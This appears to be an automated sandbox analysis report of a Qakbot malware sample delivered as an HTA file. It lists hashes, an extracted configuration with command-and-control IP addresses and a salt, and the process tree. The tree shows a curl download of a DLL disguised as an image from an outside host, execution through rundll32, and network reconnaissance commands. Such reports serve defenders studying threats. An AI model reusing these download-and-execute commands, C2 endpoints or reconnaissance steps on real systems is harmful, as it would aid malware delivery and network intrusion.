Resubmissions

02/02/2023, 21:19

230202-z6jahaba9y 10

02/02/2023, 21:19

230202-z6b67aba9w 7

02/02/2023, 21:17

230202-z48sdafh78 7

02/02/2023, 20:21

230202-y5afjaae3w 10

02/02/2023, 20:20

230202-y4k6msfd36 7

02/02/2023, 20:03

230202-ysnsdsac8z 7

02/02/2023, 20:02

230202-yr9ngaac8w 7

02/02/2023, 20:01

230202-yrllmsfb54 7

02/02/2023, 19:47

230202-yhszcsab9z 7

02/02/2023, 19:46

230202-yg5lrsfa45 7

Analysis

  • max time kernel
    1800s
  • max time network
    1799s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02/02/2023, 21:19

General

  • Target

    Open.hta

  • Size

    3KB

  • MD5

    7daa66c5c04a63b630e284360740bc3f

  • SHA1

    13ccbcef1329ae8c204c13e757a867e31f3b62bc

  • SHA256

    35e319a9cd3e423081fa1d0a0c084f555b1c5fb1042189dd969d1706f6d25fe2

  • SHA512

    c23873af1524f9d97e4f4066a64240a6339c9ebe30ed1a623c60db683b0e85189dab28976f9116a7c9a38a864b9acdc8de66fda96ea7e3e58b46217efe965744

Malware Config

Extracted

Family

qakbot

Version

404.432

Botnet

BB12

Campaign

1675352134

C2

213.67.255.57:2222

86.96.72.139:2222

119.82.122.226:443

86.96.34.182:2222

12.172.173.82:50001

107.146.12.26:2222

97.116.78.96:443

47.61.70.188:2078

197.148.17.17:2078

82.127.204.82:2222

82.121.195.187:2222

73.155.10.79:443

91.231.173.199:995

86.196.12.21:2222

90.78.51.182:2222

90.165.109.4:2222

202.186.177.88:443

92.27.86.48:2222

88.171.156.150:50000

78.130.215.67:443

Attributes
  • salt

    SoNuce]ugdiB3c[doMuce2s81*uXmcvP

Signatures

  • Qakbot/Qbot

    Qbot or Qakbot is a sophisticated worm with banking capabilities.

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Discovers systems in the same network 1 TTPs 1 IoCs
  • Gathers network information 2 TTPs 2 IoCs

    Uses commandline utility to view network configuration.

  • Kills process with taskkill 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 30 IoCs
  • Suspicious use of WriteProcessMemory 53 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Open.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1556
    • C:\Windows\SysWOW64\curl.exe
      "C:\Windows\System32\curl.exe" --output C:\ProgramData\1.png --url https://spincotech.com/8CoBExd/3.gif
      2⤵
        PID:1376
      • C:\Windows\SysWOW64\rundll32.exe
        "C:\Windows\System32\rundll32.exe" C:\ProgramData\1.png,Wind
        2⤵
        • Loads dropped DLL
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of WriteProcessMemory
        PID:3692
        • C:\Windows\SysWOW64\wermgr.exe
          C:\Windows\SysWOW64\wermgr.exe
          3⤵
            PID:1128
          • C:\Windows\SysWOW64\wermgr.exe
            C:\Windows\SysWOW64\wermgr.exe
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:3964
            • C:\Windows\SysWOW64\net.exe
              net view
              4⤵
              • Discovers systems in the same network
              PID:664
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c set
              4⤵
                PID:1256
              • C:\Windows\SysWOW64\arp.exe
                arp -a
                4⤵
                  PID:1248
                • C:\Windows\SysWOW64\ipconfig.exe
                  ipconfig /all
                  4⤵
                  • Gathers network information
                  PID:1288
                • C:\Windows\SysWOW64\nslookup.exe
                  nslookup -querytype=ALL -timeout=12 _ldap._tcp.dc._msdcs.WORKGROUP
                  4⤵
                    PID:3752
                  • C:\Windows\SysWOW64\net.exe
                    net share
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3540
                    • C:\Windows\SysWOW64\net1.exe
                      C:\Windows\system32\net1 share
                      5⤵
                        PID:436
                    • C:\Windows\SysWOW64\route.exe
                      route print
                      4⤵
                        PID:2720
                      • C:\Windows\SysWOW64\netstat.exe
                        netstat -nao
                        4⤵
                        • Gathers network information
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4600
                      • C:\Windows\SysWOW64\net.exe
                        net localgroup
                        4⤵
                        • Suspicious use of WriteProcessMemory
                        PID:3464
                        • C:\Windows\SysWOW64\net1.exe
                          C:\Windows\system32\net1 localgroup
                          5⤵
                            PID:3996
                        • C:\Windows\SysWOW64\whoami.exe
                          whoami /all
                          4⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2340
                    • C:\Windows\SysWOW64\taskkill.exe
                      "C:\Windows\System32\taskkill.exe" /f /im mshta.exe
                      2⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3412
                  • C:\Windows\system32\msiexec.exe
                    C:\Windows\system32\msiexec.exe /V
                    1⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3756

                  Network

                  MITRE ATT&CK Enterprise v6

                  Replay Monitor

                  Loading Replay Monitor...

                  Downloads

                  • C:\ProgramData\1.png

                    Filesize

                    526KB

                    MD5

                    f0f24ffaff98315065fcdcdce15e97b0

                    SHA1

                    314170e250a6352cfb62f3e63ff6cde8f585c5cf

                    SHA256

                    0f671171cf7f421ff58c023b2ab55e85b2bbb38934d5189bd911668ea2d79512

                    SHA512

                    183673716a5d6e4d36204f0f35a6c00ceb3da9735a24765cd92b51d0af0aafddb752f33c1f99833ece27d404e4b994c162eacf02666bea2329ea504512228e5c

                  • C:\ProgramData\1.png

                    Filesize

                    526KB

                    MD5

                    f0f24ffaff98315065fcdcdce15e97b0

                    SHA1

                    314170e250a6352cfb62f3e63ff6cde8f585c5cf

                    SHA256

                    0f671171cf7f421ff58c023b2ab55e85b2bbb38934d5189bd911668ea2d79512

                    SHA512

                    183673716a5d6e4d36204f0f35a6c00ceb3da9735a24765cd92b51d0af0aafddb752f33c1f99833ece27d404e4b994c162eacf02666bea2329ea504512228e5c

                  • C:\Users\Admin\AppData\Local\Temp\8BA075C0.dll

                    Filesize

                    2.1MB

                    MD5

                    f530495445432d6ae00f2b0f08f7c804

                    SHA1

                    f66f538b95b1a924c8392fbe7743d193d78eb50c

                    SHA256

                    5cc51f26704eef3b59e6d33ea690fa5c62237627269493ead5bad6f71d2de07b

                    SHA512

                    2b44ed622e63014a0d2d613d8bbc1548dd193460ce7711414dc4eb62a2aef69d57c9821f834555539b6a49f584cb46c5e82a9867ab0a0733d78e4f1d032d6ce8

                  • C:\Users\Admin\AppData\Local\Temp\FB68EA8E.dll

                    Filesize

                    2.1MB

                    MD5

                    f530495445432d6ae00f2b0f08f7c804

                    SHA1

                    f66f538b95b1a924c8392fbe7743d193d78eb50c

                    SHA256

                    5cc51f26704eef3b59e6d33ea690fa5c62237627269493ead5bad6f71d2de07b

                    SHA512

                    2b44ed622e63014a0d2d613d8bbc1548dd193460ce7711414dc4eb62a2aef69d57c9821f834555539b6a49f584cb46c5e82a9867ab0a0733d78e4f1d032d6ce8

                  • memory/3692-137-0x00000000022A0000-0x00000000022C3000-memory.dmp

                    Filesize

                    140KB

                  • memory/3964-146-0x0000000000400000-0x0000000000423000-memory.dmp

                    Filesize

                    140KB

                  • memory/3964-145-0x0000000000400000-0x0000000000423000-memory.dmp

                    Filesize

                    140KB